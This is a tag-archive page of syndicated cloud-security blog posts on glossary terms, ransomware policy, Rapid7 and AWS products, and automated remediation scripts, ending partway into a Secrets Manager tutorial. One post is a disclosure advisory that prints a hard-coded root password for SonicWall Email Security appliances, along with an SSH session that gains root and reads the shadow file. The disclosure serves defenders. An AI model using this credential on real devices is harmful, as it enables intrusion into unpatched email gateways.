Tag Archives: cloud security

Cloud Security Glossary: Key Terms and Definitions

Post Syndicated from Shelby Matthews original https://blog.rapid7.com/2021/08/11/cloud-security-glossary-key-terms-to-know/

When navigating the complexities of the public cloud, it’s easy to get lost in the endless acronyms, industry jargon, and vendor-specific terms. From K8s to IaC to Shift Left, it can be helpful to have a map to navigate the nuances of this emerging segment of the market.

That’s why a few cloud security experts here at Rapid7 created a list of terms that cover the basics — the key terms and concepts that help you continue your journey into cloud security and DevSecOps with clarity and confidence. Here are the most important entries in your cloud security glossary.


Application Program Interface (API): A set of functions and procedures allowing for the creation of applications that can access the features or data of an operating system, application, or other service.

  • The InsightCloudSec API can be used to create insights and bots, modify compliance packs, and perform other functions outside of the InsightCloudSec user interface.

Cloud Security Posture Management (CSPM): CSPM solutions continuously manage cloud security risk. They detect, log, report, and provide automation to address common issues. These can range from cloud service configurations to security settings and are typically related to governance, compliance, and security for cloud resources.

Cloud Service Provider (CSP): A third-party company that offers a cloud-based platform, infrastructure, application, or storage services. The most popular CSPs are AWS, Azure, Alibaba, and GCP.

Cloud Workload Protection Platform (CWPP): CWPPs help organizations protect their capabilities or workloads (applications, resources, etc.) running in a cloud instance.

Container Security: A container represents a software application and may contain all necessary code, run-time, system tools, and libraries needed to run the application. Container hosts can be packed with risk, so properly securing them means maintaining visibility into vulnerabilities associated with their components and layers.

Entitlements: Entitlements, or permissions entitlements, give domain users control over basic users’ and organization admins’ permissions to access certain parts of a tool.

Identity and Access Management (IAM): A framework of policies and technologies for ensuring the right users have the appropriate access to technology resources. A related discipline is Cloud Infrastructure Entitlement Management (CIEM), which provides identity and access governance controls with the goal of reducing excessive cloud infrastructure entitlements and streamlining least-privileged access (LPA) across dynamic, distributed cloud environments.

Infrastructure: With respect to cloud computing, infrastructure refers to an enterprise’s entire cloud-based or local collection of resources and services. This term is used synonymously with “cloud footprint.”

Infrastructure as Code (IaC): The process of managing and provisioning computer data centers through machine-readable definition files, rather than physical hardware configuration or interactive configuration tools. With IaC, configuration files contain your infrastructure specifications, making it easier to edit and distribute configurations.
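As a brief, generic illustration of the idea (not tied to any particular product), here is a minimal sketch using the AWS CDK for Python, assuming the aws-cdk-lib v2 and constructs packages are installed. The bucket name and settings are arbitrary examples; the point is that the infrastructure definition lives in version-controlled code rather than in a console:

from aws_cdk import App, Stack
from aws_cdk import aws_s3 as s3
from constructs import Construct

class StorageStack(Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)
        # The bucket's configuration is declared in code, so it can be reviewed,
        # versioned, and redeployed consistently across environments.
        s3.Bucket(
            self,
            "LogsBucket",
            versioned=True,
            encryption=s3.BucketEncryption.S3_MANAGED,
            block_public_access=s3.BlockPublicAccess.BLOCK_ALL,
        )

app = App()
StorageStack(app, "StorageStack")
app.synth()

Running cdk deploy against a definition like this provisions or updates the bucket, and drift from the declared configuration can be caught by redeploying the same code.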

Kubernetes: A portable, extensible open-source platform for deploying, managing, and orchestrating containerized workloads and services at scale.

Least-Privileged Access (LPA): A security and access control concept that gives users the minimum necessary permissions based on the functions required for their particular roles.
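For a minimal sketch of what least privilege looks like in practice, the boto3 snippet below creates a policy that grants read-only access to a single bucket and nothing else. The policy and bucket names are placeholders for illustration:

import json

import boto3

iam = boto3.client("iam")

# A narrowly scoped policy: read-only access to one bucket, nothing else.
policy_document = {
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",
        "Action": ["s3:GetObject", "s3:ListBucket"],
        "Resource": [
            "arn:aws:s3:::example-bucket",      # placeholder bucket name
            "arn:aws:s3:::example-bucket/*",
        ],
    }],
}

iam.create_policy(
    PolicyName="ExampleBucketReadOnly",         # placeholder policy name
    PolicyDocument=json.dumps(policy_document),
)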

Shared Responsibility Model: A framework in cloud computing that defines who is responsible for the security and compliance of each component of the cloud architecture. With on-premises data centers, the responsibility is solely on your organization to manage and maintain security for the entire technology stack, from the physical hardware to the applications and data. Because public cloud computing purposefully abstracts layers of that tech stack, this model acts as an agreement between the CSP and their customer as to who takes on the responsibility of managing and maintaining proper hygiene and security within the cloud infrastructure.

Shift Left: A concept that refers to building security into an earlier stage of the development cycle. Traditionally, security checks occurred at the end of the cycle. By shifting left, organizations can ensure their applications are more secure from the start — and at a much lower cost.

The Ransomware Task Force: A New Approach to Fighting Ransomware

Post Syndicated from Jen Ellis original https://blog.rapid7.com/2021/08/03/the-ransomware-task-force-a-new-approach-to-fighting-ransomware/

In the past few months, we’ve seen ransomware attacks shut down healthcare across Ireland, fuel delivery across parts of the US, and meat processing across Australia, Canada, and the US. We’ve seen demands of payments in the tens of millions of dollars. We’re also seeing trends around ransomware-as-a-service and double or triple extortion continue to rise. It’s clear that ransomware attacks are increasing in frequency, breadth, sophistication, scale, and impact.

Recognizing this, the Institute for Security and Technology put together a comprehensive Ransomware Task Force (RTF) to identify new approaches to shift the dynamics of ransomware and reduce opportunities for attackers. The Ransomware Task Force involved more than 60 participants representing a wide range of expertise and experience, including from multiple governments, law enforcement, civil society and public policy nonprofits, and security advancement groups. From the private sector, organizations of all sizes participated, including many that have experienced ransomware attacks firsthand or that are involved in dealing with the fallout, such as cybersecurity companies, law firms, and cyber insurers. Rapid7 was among those that participated — I was one of the co-chairs, and my amazing colleagues, Bob Rudis, Tod Beardsley, and Scott King participated as well.

From the outset, the intent of the Task Force was to look at the issue holistically and come up with a comprehensive set of recommendations to deter and disrupt ransomware attackers, thereby helping organizations prepare for and respond to attacks at scale. Recognizing the scale and severity of the issue — and the need for systemic and societal responses — our target audience was policymakers and government leaders.

The Task Force recognized that ransomware is not a new topic, and we had no desire to rehash previous efforts. Instead, we sought to learn from them and, where appropriate, amplify and extend them, supporting the next period of growth on this thorny issue. Ransomware’s reach and impact are increasing, which has a serious impact on society. The effects are only likely to worsen without significant action from governments and other leaders.

Key recommendations

The final report issued by the Task Force makes 48 recommendations, broken into actions to deter, disrupt, prepare for, and respond to ransomware attacks. The recommendations are designed to work in concert with each other, though we recognize there are a large number of them, and many will take time to implement. In reality, though, there truly is no silver bullet for addressing ransomware, no one thing that will magically solve this problem. If we want to shift the dynamics in a meaningful way that makes it harder for attackers to succeed, we need to make adjustments in a range of areas. It’s also worth noting that the Task Force’s goal was to provide recommendations to government and other leaders, not to provide tactical, technical guidance.

Given there are 48 recommendations, and they are well set out in the report, I won’t go over them now. I’ll just highlight a few of the big themes and, where relevant, what’s happened since the launch of the report.

Make it a top priority

One of the biggest challenges we face with any discussion around cybercrime is that it’s often viewed as a niche technical problem, not as a broad societal issue. This has made it harder to get the required attention and investment in solutions. The Task Force called for senior political leaders to recognize ransomware for what it is: a national security issue and a major threat to our ways of life (Action 1.2.5, page 26). We also called for a whole-of-government approach whereby leaders would engage various stakeholders across the government to help ensure necessary action is taking place collaboratively across the board (Actions 1.2.1 and 1.2.2, page 23).

One possible silver lining of the recent attacks against critical infrastructure is that they’ve helped establish this level of priority. In the US, we’ve seen various parts of the government start to take action: Congress has held hearings and proposed legislation; the Department of Justice has given ransomware investigations similar status to those for terrorism; the Department of Homeland Security has issued new cybersecurity guidelines for pipelines; the White House issued a memo to urge the private sector to take steps to protect against ransomware; and even President Biden has talked about ransomware in press conferences and with other world leaders.

Global action for a global problem

To take meaningful action to reduce ransomware attacks, we must acknowledge the geopolitical aspects. Firstly, the issue affects countries all around the world. Governments taking action should do so in coordination and cooperation in order to amplify the impact and hit attackers on multiple fronts at once (Actions 1.1.1 – 1.1.4, 1.2.6, pages 21-22, 26).

Secondly, and perhaps more crucially, one of the main advantages for attackers is the existence of nations that provide safe havens, because they’re either unwilling or unable to prosecute cybercriminals. This also makes it much harder for other countries to prosecute these criminals, and as such, ransomware attackers rarely seem to fear consequences for their actions.

The Task Force recommended that governments work together to tackle the issue of safe havens and adopt key practices to protect their citizens — or help them better protect themselves (Actions 1.3.1 and 1.3.2, page 27).

We’ve already seen some progress in this regard, as ransomware was raised at the recent G7 Summit, and the resulting communique included the following commitment from members:

“We also commit to work together to urgently address the escalating shared threat from criminal ransomware networks. We call on all states to urgently identify and disrupt ransomware criminal networks operating from within their borders, and hold those networks accountable for their actions.”

It will be interesting to see whether and how the G7 members will follow through on this commitment. I hope they’ll take action, build momentum, and recruit participation from other nations.

Reducing paths to revenue

As mentioned above, we’re seeing attackers demand higher and higher ransoms, which likely attracts other criminals to enter the market. Hopefully, the opposite is also true; if we reduce the opportunity to make money from ransomware, the number of attacks will decrease.

This rationale, coupled with discomfort over the idea of ransom payments being used to fund other types of organized crime — including human trafficking, child exploitation, and weapons trafficking — resulted in a great deal of discussion around the notion of banning ransom payments.

While the Task Force agreed that payments should be discouraged, the idea of a legal prohibition was challenging. Given the lack of real risk or friction for attackers, it’s likely that if payments were outlawed, attackers wouldn’t simply give up. Rather, they’d first play a game of chicken against victims, focusing on the organizations least likely to resist paying — namely providers of critical functions that can’t be disrupted without profound impact on society, or small-to-medium businesses that aren’t financially able to prepare for and weather an attack.

Given the concerns over these practicalities, the Task Force did not recommend banning payments. Rather, we looked at alternative ways of reducing the ease with which attackers realize a profit. There are two main paths to this: reducing the likelihood of victims making a payment, and making it technically harder for attackers to get their payment.

In terms of making victims think twice before making a payment, the RTF recommended a few measures:

  • Requiring the disclosure of payments (Action 4.2.4, page 46): This will help build a greater understanding of what is happening in the attack landscape and may enable law enforcement to gather more information on attackers, or even recapture payments.
  • Requiring organizations to conduct a cost-benefit analysis prior to making payments (Actions 4.3.1 and 4.3.2, pages 47 and 48): This will encourage organizations to look into alternative options for resolution — for example, turning to the No More Ransom Project to seek decryption keys.
  • Creating a fund to assist certain organizations in recovery (Action 4.1.2, page 43): Often, organizations say the cost of recovery significantly outweighs that of the ransom, leaving them no choice but to give in to their attackers’ demands. For qualifying organizations, this fund would rebalance the scales and give them a pragmatic alternative to paying the ransom.

On the other track — disrupting the system that facilitates the payment of ransoms — the RTF recommended that cryptocurrency exchanges, kiosks, and over-the-counter trading desks be required to comply with existing laws, such as Know Your Customer (KYC), Anti-Money Laundering (AML), and Combatting Financing of Terrorism (CFT) (Action 2.1.2, pages 29 and 30).

Better preparation, better response

During the explorations of the Task Force, it became apparent that part of the reason ransomware attacks are so successful is that many organizations don’t truly understand the threat, don’t believe it’s relevant to them, or don’t know how to protect themselves. We repeatedly heard that, while there is a lot of information on ransomware, it’s overwhelming and often unhelpful. Many organizations don’t know what to focus on, and guidance may be oversimplified, overcomplicated, or insufficient.

With this in mind, one of our top recommendations was for the development of a ransomware framework that would cover measures for both preparing for and responding to attacks (Action 3.1.1, pages 35 and 36). The framework would need to be pragmatic, actionable, and address varying levels of sophistication and capability (Action 3.1.2, page 36). And because one of our main themes was around international cooperation, we also recommended there be a single source of truth adopted and promoted by multiple governments around the world. In fact, we recommended the framework be developed through both international and public-private collaboration. It should also be kept up to date to react to evolving ransomware attack trends.

Creating the framework is a lift, but it’s only part of the battle — you can’t drive adoption if you don’t also tackle the lack of awareness and understanding. As such, we also recommend that governments run high-profile awareness campaigns, partnering with organizations with reach into audiences that aren’t being well addressed today (Actions 3.2.1 and 3.2.2, pages 37 and 38). For example, many governments have toolkits or content aimed at small-to-medium businesses, but most leaders of these organizations seem largely unaware of the risk — until someone they know personally is hit by an attack.

The path forward

Unfortunately, ransomware continues to dominate headlines and harm organizations around the world. As a result, many governments are paying a great deal of attention to this issue and looking for solutions. I’m relieved to say the Ransomware Task Force’s report and recommendations have seen a fair bit of interest and support. For us, the next challenge is to keep the momentum going and help governments translate interest into action.

In the meantime, my colleagues at Rapid7 and I will continue to try to help our customers and community prepare for and respond to attacks. We’re working on some other content to help people better understand the dynamics of the issue, as well as the steps they can take to protect themselves or get involved in broader response efforts.

Look out for our series of blogs on different aspects of ransomware, and in the meantime, check out our interviews with ransomware experts on our Security Nation podcast. You can also check out my talk and Q&A on the Ransomware Task Force at Black Hat, or as part of Rapid7’s Virtual Vegas, which includes a Ransomware (un)Happy Hour — bring your ransomware war stories, lessons learned, or questions.

Rapid7 Introduces: Kubernetes Security Guardrails

Post Syndicated from Alon Berger original https://blog.rapid7.com/2021/07/26/rapid7-introduces-kubernetes-security-guardrails/

Cloud and container technology provides tremendous flexibility, speed, and agility, so it’s not surprising that organizations around the globe continue to embrace it. Many are using multiple tools to secure their often complex cloud and container environments while struggling to maintain the flexibility, speed, and agility required to keep security intact.

Cloud Security Just Got Better!

In addition to acquiring DivvyCloud, a top-tier Cloud Security Posture Management (CSPM) platform, in 2020, Rapid7 recently announced another successful acquisition — joining forces with Alcide, a leading Kubernetes security start-up that offers advanced Cloud Workload Protection Platform (CWPP) capabilities.

Rapid7 is taking the lead in the CSPM space by leveraging both DivvyCloud’s and Alcide’s capabilities and incorporating them into a single platform: InsightCloudSec, your one-stop shop for superior cloud security solutions.

Learn more about InsightCloudSec here

Built for DevOps, Trusted by Security

In retrospect, 2020 was a tipping point for the Kubernetes community, with a massive increase in adoption across the globe. Many companies, seeking an efficient, cost-effective way to make this huge shift to the cloud, turned to Kubernetes. But this in turn created a growing need to remove the Kubernetes security blind spots. It is for this reason that we are introducing Kubernetes Security Guardrails.

With Kubernetes Security Guardrails, organizations are equipped with a multi-cluster vulnerability scanner that covers Kubernetes security best practices and compliance policies, such as the CIS Benchmarks. As part of Rapid7’s InsightCloudSec solution, this new capability introduces a platform-based, easy-to-maintain approach to Kubernetes security that is deployed in minutes and fully streamlined into the Kubernetes pipeline.

Securing Kubernetes With InsightCloudSec

Kubernetes Security Guardrails is the most comprehensive solution for all relevant Kubernetes security requirements, designed from a DevOps perspective with in-depth visibility for security teams. Integrated within minutes, Kubernetes Guardrails simplifies the security assessment for the entire Kubernetes environment and the CI/CD pipeline while creating baseline profiles for each cluster, highlighting and scoring security risks, misconfigurations, and hygiene drifts.

Both DevOps and Security teams enjoy the continuous and dynamic analysis of their Kubernetes deployments, all while seamlessly complying with regulatory requirements for Kubernetes such as PCI, GDPR, and HIPAA.

With Kubernetes Guardrails, Dev teams are able to create a snapshot of cluster risks, delivered with a detailed list of misconfigurations, while detecting real-time hygiene and conformance drifts for deployments running on any cloud environment.

Some of the most common use cases include the following (a short code sketch of one such check appears after the list):

  • Kubernetes vulnerability scanning
  • Hunting misplaced secrets and excessive secret access
  • Workload hardening (from pod security to network policies)
  • Istio security and configuration best practices
  • Ingress controllers security
  • Kubernetes API server access privileges
  • Kubernetes operators best practices
  • RBAC controls and misconfigurations
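To give a flavor of what one of these checks involves, here is a generic sketch using the official Kubernetes Python client (pip install kubernetes) that flags pods running privileged containers. It illustrates the kind of check behind workload hardening in general, not how InsightCloudSec implements it:

from kubernetes import client, config

def find_privileged_pods():
    # Load credentials from the local kubeconfig (assumes kubectl access to the cluster)
    config.load_kube_config()
    v1 = client.CoreV1Api()

    findings = []
    for pod in v1.list_pod_for_all_namespaces(watch=False).items:
        for container in pod.spec.containers:
            security_context = container.security_context
            if security_context is not None and security_context.privileged:
                findings.append(
                    f"{pod.metadata.namespace}/{pod.metadata.name} ({container.name})"
                )
    return findings

if __name__ == "__main__":
    for finding in find_privileged_pods():
        print("Privileged container found:", finding)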

Rapid7 proudly brings forward a Kubernetes security solution that encapsulates all-in-one capabilities with incomparable coverage for all things Kubernetes.

With a security-first approach and strict adherence to compliance, Kubernetes Guardrails enables a better understanding of and control over distributed projects, and helps organizations maintain smooth business operations.

Want to learn more? Register for the webinar on InsightCloudSec and its Kubernetes protection.

Introducing InsightCloudSec

Post Syndicated from Brian Johnson original https://blog.rapid7.com/2021/07/07/introducing-insightcloudsec/

A little over a year ago, when DivvyCloud first combined forces with Rapid7, I wrote that we did it because of culture, technology alignment, and the opportunity to drive even greater innovation in cloud security.

Those core values remain true, and so does something else. As more organizations adopt and invest in cloud and container technology, the issues facing cloud security programs continue to put enterprises at significant risk. The need for fully-integrated solutions that enable continuous security and compliance for cloud environments also continues to increase exponentially. Organizations need simple yet comprehensive visibility into their cloud and container environments to help mitigate risk, potential threats, and misconfigurations. With this growing need for automation and security, I’m proud to announce our next step in helping to drive cloud security forward: InsightCloudSec.

InsightCloudSec is our combined solution of all the things our customers love about DivvyCloud, now with cluster-level Kubernetes security capabilities from Alcide, aligned and integrated with Rapid7’s Insight Platform. Our team and customer-driven, innovation-focused roadmap will stay the same. Combining all of our efforts and energy into InsightCloudSec allows us to move forward as a more powerful cloud security solution.

Combining forces to become a leader in cloud security

Rapid7 acquired both DivvyCloud and Alcide in the past 15 months to more effectively solve the complex security challenges that we’ve seen arise from the scale and speed of cloud adoption.

Now more than ever, it’s clear that solving these challenges requires a single solution that brings the core capabilities of cloud security together, including posture management, identity and access management, infrastructure as code analysis, and Kubernetes protection. Furthermore, we want to bring all of this cloud security functionality together on a platform that also features additional security capabilities, from vulnerability management to detection and response, in order to provide the full context necessary to accurately assess risk within the cloud environment.

By bringing all of these features together, we aim to help our customers achieve three goals:

  • Shift Left — We want to help customers prevent problems before they happen by providing a single, consistent set of security checks throughout the CI/CD pipeline to uncover misconfigurations and policy violations without delaying deployment.
  • Reduce Noise — We want to simplify and speed up risk assessment by combining unified visibility and shared terminology with rich contextual insights gathered from across each layer of your cloud environment.
  • Automate Workflows — Finally, we want to help security teams enable developers to take full advantage of the speed and scale of the cloud safely with precise automation that speeds up remediation, reduces busywork, and allows the security team to focus on the bigger picture.

Behind this announcement, our team is as energized and dedicated as ever to our goal of delivering innovative capabilities and the industry-leading support that has helped our customers develop some of the most mature cloud security programs in the world over the last eight years.

If you’re interested in learning more about what we have in store, join us for an upcoming webinar on July 27 at 11:00 a.m. EDT.

Automated remediation level 3: Governance and hygiene

Post Syndicated from Aaron Wells original https://blog.rapid7.com/2021/06/28/automated-remediation-level-3-governance-and-hygiene/

Mold it, make it, just don’t fake it

At a quick glance, it seems like the title of this blog is “government hygiene.” Most likely, that wouldn’t be a particularly exciting read, but we’re hoping you might be engaged enough to gain a few takeaways from this fourth piece in our series on automating remediation and how it can benefit your team and cost center.

The best way to mold a solution that makes sense for your company and cloud security is by adding actions that cause the fewest deviations in your day-to-day operations. Of course, there are several best-practice use cases that can make sense for your organization. Let’s take a look at a few so you can decide which one(s) work(s) for you.

Environment enforcement

Sandboxes are designed to be safe spaces, so they should also be clean spaces. As Software Development Life Cycles (SDLCs) accelerate and security posture moves increasingly left into the hands of the developers spinning things up, it’s important not only to isolate and lock down your sandbox space, but also to create a repeat cleaning schedule. Your software release cycle can also act as regularly scheduled sandbox maintenance.

No exemptions for expensive instances

Spinning up instances that suck up resources from other critical applications can cost you. Sometimes they’re necessary; often they’re not. Whether it’s by cost, family type, or hardware specs, continuous monitoring is key, so that even when unnecessarily resource-intensive processes aren’t automatically killed, you still have a good idea of what’s costing too much time and too much money. A scheduled Amazon CloudWatch Events (EventBridge) rule, for instance, can trigger a small Lambda function that stops and starts EC2 instances at set intervals.
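As a rough sketch of what such a scheduled job can look like, the Lambda handler below stops running instances that carry a hypothetical auto-stop=true tag. The tag name is an assumption made for illustration, and the function needs permission to call ec2:DescribeInstances and ec2:StopInstances:

import boto3

ec2 = boto3.client("ec2")

def lambda_handler(event, context):
    # Find running instances that carry the (hypothetical) auto-stop tag
    reservations = ec2.describe_instances(
        Filters=[
            {"Name": "tag:auto-stop", "Values": ["true"]},
            {"Name": "instance-state-name", "Values": ["running"]},
        ]
    )["Reservations"]

    instance_ids = [
        instance["InstanceId"]
        for reservation in reservations
        for instance in reservation["Instances"]
    ]

    if instance_ids:
        # Stop (not terminate) the instances so they can be started again on schedule
        ec2.stop_instances(InstanceIds=instance_ids)
    return {"stopped": instance_ids}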

Cleanliness ≠ costliness

Properly automating anything in cloud security is ultimately going to save money for the organization. But, as we’ve discussed to some extent above and throughout this series, you’ll want to make sure automation isn’t creating unnecessary instances, orphaning outdated resources, or letting old snapshots and unused databases pile up. Yep, there are a lot of things that can start to add up and begin puffing out a budget. Creating more efficient data pipelines and discovering which parts of the remediation process are the most labor-intensive can help identify where you should focus effort and resources. In this way, you can begin to target the areas that will require the most regular hygiene and cleanup.
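For example, a small cleanup job along the following lines can keep stale snapshots from quietly accumulating cost. This is a minimal sketch that treats snapshots older than 90 days in your own account as candidates for review; in practice you would also confirm they aren't referenced by AMIs or backups before deleting anything:

from datetime import datetime, timedelta, timezone

import boto3

ec2 = boto3.client("ec2")
cutoff = datetime.now(timezone.utc) - timedelta(days=90)

# List only snapshots owned by this account
snapshots = ec2.describe_snapshots(OwnerIds=["self"])["Snapshots"]

for snapshot in snapshots:
    if snapshot["StartTime"] < cutoff:
        # A real job would log this and check for AMI/backup references first
        print("Deleting stale snapshot", snapshot["SnapshotId"])
        ec2.delete_snapshot(SnapshotId=snapshot["SnapshotId"])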

Put a cork in the port (exposure)

Since everything on the internet is communicated and transferred via ports, it’s probably a good idea to think about locking down exposed ports that may be running protocols like Secure Shell (SSH) or Remote Desktop Protocol (RDP). Automating this type of cleanup will require knowing, similar to the above section, which ports do most of the heavy lifting in the daily rhythms of your cloud-security operations. If a port isn’t being used in a meaningful way — or you simply don’t have any idea what its use is — it’s best to shut it down.
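As a minimal sketch of that kind of automated cleanup, assuming you have decided that SSH (port 22) should never be open to the world, a boto3 snippet like this can find and revoke the offending security group rules:

import boto3

ec2 = boto3.client("ec2")

# Find security groups with an inbound rule allowing SSH from anywhere
response = ec2.describe_security_groups(
    Filters=[
        {"Name": "ip-permission.from-port", "Values": ["22"]},
        {"Name": "ip-permission.to-port", "Values": ["22"]},
        {"Name": "ip-permission.cidr", "Values": ["0.0.0.0/0"]},
    ]
)

for group in response["SecurityGroups"]:
    print("Revoking open SSH rule on", group["GroupId"])
    ec2.revoke_security_group_ingress(
        GroupId=group["GroupId"],
        IpPermissions=[{
            "IpProtocol": "tcp",
            "FromPort": 22,
            "ToPort": 22,
            "IpRanges": [{"CidrIp": "0.0.0.0/0"}],
        }],
    )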

Stay vigilant while basking in benefits

Ensuring you’re getting the most organized automation framework as possible takes work, but it’s considerably less work than if you had no framework at all. Automating good governance and hygiene practices can add time saved to the overall benefits gained from this work. But, we must all be good monitors of these processes and put checks in place to ensure your automation framework actually works for you and continues to save time and effort for years to come.

With that, we’re ready for a deep-dive into the final of 4 Levels of Automated Remediation. You can also read the previous entry in this series here.  

Level 4 coming soon!

CVE-2021-20025: SonicWall Email Security Appliance Backdoor Credential

Post Syndicated from Tod Beardsley original https://blog.rapid7.com/2021/06/23/cve-2021-20025-sonicwall-email-security-appliance-backdoor-credential/

The virtual, on-premises version of the SonicWall Email Security Appliance ships with an undocumented, static credential, which can be used by an attacker to gain root privileges on the device. This is an instance of CWE-798: Use of Hard-coded Credentials, and has an estimated CVSSv3 score of 9.1. This issue was fixed by the vendor in version 10.0.10, according to the vendor’s advisory, SNWLID-2021-0012.

Product Description

The SonicWall Email Security Virtual Appliance is a solution which “defends against advanced email-borne threats such as ransomware, zero-day threats, spear phishing and business email compromise (BEC).” It is in use in many industries around the world as a primary means of preventing several varieties of email attacks. More about SonicWall’s solutions can be found at the vendor’s website.

Credit

This issue was discovered by William Vu of Rapid7, and is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Exploitation

The session capture detailed below illustrates using the built-in SSH management interface to connect to the device as the root user with the password, “sonicall”.

This attack was tested on 10.0.9.6105 and 10.0.9.6177, the latest builds available at the time of testing.

wvu@kharak:~$ ssh -o stricthostkeychecking=no -o userknownhostsfile=/dev/null root@192.168.123.251
Warning: Permanently added '192.168.123.251' (ECDSA) to the list of known hosts.
For CLI access you must login as snwlcli user.
root@192.168.123.251's password: sonicall
[root@snwl ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
[root@snwl ~]# uname -a
Linux snwl.example.com 4.19.58-snwl-VMWare64 #1 SMP Wed Apr 14 20:59:36 PDT 2021 x86_64 GNU/Linux
[root@snwl ~]# grep root /etc/shadow
root:Y0OoRLtjUwq1E:12605:0:::::
[root@snwl ~]# snwlcli
Login: admin
Password:
SNWLCLI> version
10.0.9.6177
SNWLCLI>

Impact

Given remote root access to what is usually a perimeter-homed device, an attacker can further extend their reach into a targeted network to launch additional attacks against internal infrastructure from across the internet. More locally, an attacker could likely use this access to update or disable email scanning rules and logic to allow for malicious email to pass undetected to further exploit internal hosts.

Remediation

As detailed in the vendor’s advisory, users are urged to use at least version 10.0.10 on fresh installs of the affected virtual host. Note that updating to version 10.0.10 or later does not appear to resolve the issue directly; users who update existing versions should ensure they are also connected to the MySonicWall Licensing services in order to completely resolve the issue.

For sites that are not able to update or replace affected devices immediately, access to remote management services should be limited to only trusted, internal networks — most notably, not the internet.

Disclosure Timeline

Rapid7’s coordinated vulnerability disclosure team is deeply impressed with this vendor’s rapid turnaround time from report to fix. This vulnerability was both reported and confirmed on the same day, and thanks to SonicWall’s excellent PSIRT team, a fix was developed, tested, and released almost exactly three weeks after the initial report.

  • April, 2021: Issue discovered by William Vu of Rapid7
  • Thu, Apr 22, 2021: Details provided to SonicWall via their CVD portal
  • Thu, Apr 22, 2021: Confirmed reproduction of the issue by the vendor
  • Thu, May 13, 2021: Update released by the vendor, removing the static account
  • Thu, May 13, 2021: CVE-2021-20025 published in SNWLID-2021-0012
  • Wed, Jun 23, 2021: Rapid7 advisory published with further details

AWS Verified episode 5: A conversation with Eric Rosenbach of Harvard University’s Belfer Center

Post Syndicated from Stephen Schmidt original https://aws.amazon.com/blogs/security/aws-verified-episode-5-a-conversation-with-eric-rosenbach-of-harvard-universitys-belfer-center/

I am pleased to share the latest episode of AWS Verified, where we bring you conversations with global cybersecurity leaders about important issues, such as how to create a culture of security, cyber resiliency, Zero Trust, and other emerging security trends.

Recently, I got the opportunity to experience distance learning when I took the AWS Verified series back to school. I got a taste of life as a Harvard grad student, meeting (virtually) with Eric Rosenbach, Co-Director of the Belfer Center of Science and International Affairs at Harvard University’s John F. Kennedy School of Government. I call it, “Verified meets Veritas.” Harvard’s motto may never be the same again.

In this video, Eric shared with me the Belfer Center’s focus as the hub of the Harvard Kennedy School’s research, teaching, and training at the intersection of cutting-edge, interdisciplinary topics, such as international security, environmental and resource issues, and science and technology policy. In recognition of the Belfer Center’s consistently stellar work and its six consecutive years ranked as the world’s #1 university-affiliated think tank, in 2021 it was named a center of excellence by the University of Pennsylvania’s Think Tanks and Civil Societies Program.

Eric’s deep connection to the students reflects the Belfer Center’s mission to prepare future generations of leaders to address critical areas in practical ways. Eric says, “I’m a graduate of the school, and now that I’ve been out in the real world as a policy practitioner, I love going into the classroom, teaching students about the way things work, both with cyber policy and with cybersecurity/cyber risk mitigation.”

In the interview, I talked with Eric about his varied professional background. Prior to the Belfer Center, he was the Chief of Staff to US Secretary of Defense, Ash Carter. Eric was also the Assistant Secretary of Defense for Homeland Defense and Global Security, where he was known around the US government as the Pentagon’s cyber czar. He has served as an officer in the US Army, written two books, been the Chief Security Officer for the European ISP Tiscali, and was a professional committee staff member in the US Senate.

I asked Eric to share his opinion on what the private sector and government can learn from each other. I’m excited to share Eric’s answer to this with you as well as his thoughts on other topics, because the work that Eric and his Belfer Center colleagues are doing is important for technology leaders.

Watch my interview with Eric Rosenbach, and visit the AWS Verified webpage for previous episodes, including interviews with security leaders from Netflix, Vodafone, Comcast, and Lockheed Martin. If you have an idea or a topic you’d like covered in this series, please leave a comment below.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author

Steve Schmidt

Steve is Vice President and Chief Information Security Officer for AWS. His duties include leading product design, management, and engineering development efforts focused on bringing the competitive, economic, and security benefits of cloud computing to business and government customers. Prior to AWS, he had an extensive career at the Federal Bureau of Investigation, where he served as a senior executive and section chief. He currently holds 11 patents in the field of cloud security architecture. Follow Steve on Twitter.

How to replicate secrets in AWS Secrets Manager to multiple Regions

Post Syndicated from Fatima Ahmed original https://aws.amazon.com/blogs/security/how-to-replicate-secrets-aws-secrets-manager-multiple-regions/

On March 3, 2021, we launched a new feature for AWS Secrets Manager that makes it possible for you to replicate secrets across multiple AWS Regions. You can give your multi-Region applications access to replicated secrets in the required Regions and rely on Secrets Manager to keep the replicas in sync with the primary secret. In scenarios such as disaster recovery, you can read replicated secrets from your recovery Regions, even if your primary Region is unavailable. In this blog post, I show you how to automatically replicate a secret and access it from the recovery Region to support a disaster recovery plan.

With Secrets Manager, you can store, retrieve, manage, and rotate your secrets, including database credentials, API keys, and other secrets. When you create a secret using Secrets Manager, it’s created and managed in a Region of your choosing. Although scoping secrets to a Region is a security best practice, there are scenarios such as disaster recovery and cross-Regional redundancy that require replication of secrets across Regions. Secrets Manager now makes it possible for you to easily replicate your secrets to one or more Regions to support these scenarios.

With this new feature, you can create Regional read replicas for your secrets. When you create a new secret or edit an existing secret, you can specify the Regions where your secrets need to be replicated. Secrets Manager will securely create the read replicas for each secret and its associated metadata, eliminating the need to maintain a complex solution for this functionality. Any update made to the primary secret, such as a secret value updated through automatic rotation, will be automatically propagated by Secrets Manager to the replica secrets, making it easier to manage the life cycle of multi-Region secrets.

Note: Each replica secret is billed as a separate secret. For more details on pricing, see the AWS Secrets Manager pricing page.

Architecture overview

Suppose that your organization has a requirement to set up a disaster recovery plan. In this example, us-east-1 is the designated primary Region, where you have an application running on a simple AWS Lambda function (for the example in this blog post, I’m using Python 3). You also have an Amazon Relational Database Service (Amazon RDS) – MySQL DB instance running in the us-east-1 Region, and you’re using Secrets Manager to store the database credentials as a secret. Your application retrieves the secret from Secrets Manager to access the database. As part of the disaster recovery strategy, you set up us-west-2 as the designated recovery Region, where you’ve replicated your application, the DB instance, and the database secret.

To elaborate, the solution architecture consists of:

  • A primary Region for creating the secret, in this case us-east-1 (N. Virginia).
  • A replica Region for replicating the secret, in this case us-west-2 (Oregon).
